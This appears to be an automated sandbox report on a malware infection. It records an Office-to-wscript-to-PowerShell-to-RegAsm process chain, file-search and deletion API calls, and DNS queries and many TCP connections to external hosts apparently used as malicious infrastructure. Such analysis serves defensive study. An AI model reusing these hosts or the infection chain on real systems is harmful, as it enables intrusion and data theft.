                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407877 FindFirstFileW,FindNextFileW,14_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044E8F9 FindFirstFileExA,14_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407CD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global trafficDNS query: name: a38.fr
                Source: global trafficDNS query: name: a38.fr
                Source: global trafficDNS query: name: a38.fr
                Source: global trafficDNS query: name: a38.fr
                Source: global trafficDNS query: name: a38.fr
                Source: global trafficDNS query: name: a38.fr
                Source: global trafficDNS query: name: a38.fr
                Source: global trafficDNS query: name: a38.fr
                Source: global trafficDNS query: name: ia803104.us.archive.org
                Source: global trafficDNS query: name: geoplugin.net
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 178.237.33.50:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
